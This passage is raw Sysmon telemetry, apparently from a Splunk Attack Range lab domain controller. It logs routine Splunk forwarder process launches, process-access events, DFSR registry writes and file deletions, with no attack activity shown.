Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001047600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.988{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.973{466BC892-F3E3-60EB-107D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001047592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001047591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001047590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:51.704{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001047589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.621{466BC892-F3E3-60EB-0F7D-00000000CF01}101363916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.504{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D780B18ECB1B3EDF93374C796A836398,SHA256=9B07024B832D3DC7EBA8BF75B3762146CF18AEDB8516CB013B9AACCC3F637E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:51.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=279DAC26BDFFB058B6C756B3E4E9641E,SHA256=7972352177ECD00635F70AFE4144084C2E159C6758998DBB926C4CEC35F0BDB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.321{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.305{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0D02F7B01C021201C015C9E53D43008,SHA256=BFEA0F27BD20FC7392EB5A1CB0CB0A6C6C9CD53A191B3685D2D1E62AA4A8D858,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.656{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.641{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 